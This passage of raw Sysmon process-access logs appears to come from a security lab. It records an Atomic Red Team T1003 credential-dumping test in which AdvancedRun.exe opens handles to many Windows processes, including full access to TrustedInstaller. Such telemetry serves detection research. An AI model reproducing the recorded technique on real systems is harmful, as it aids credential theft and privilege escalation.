10341000x80000000000000003967436Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967435Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967434Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967433Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003967431Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967430Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967429Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967428Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967427Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003967426Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-DAE7-61EA-1700-000000002702}13002268C:\Windows\System32\svchost.exe{834264DD-F282-61EA-2004-000000002702}988C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003967425Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967424Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967423Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967422Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967421Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003967420Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-1F04-000000002702}23964848C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967419Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:58.316{834264DD-F282-61EA-2004-000000002702}988296C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-F282-61EA-2104-000000002702}108C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21f3|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21bd|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003967418Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 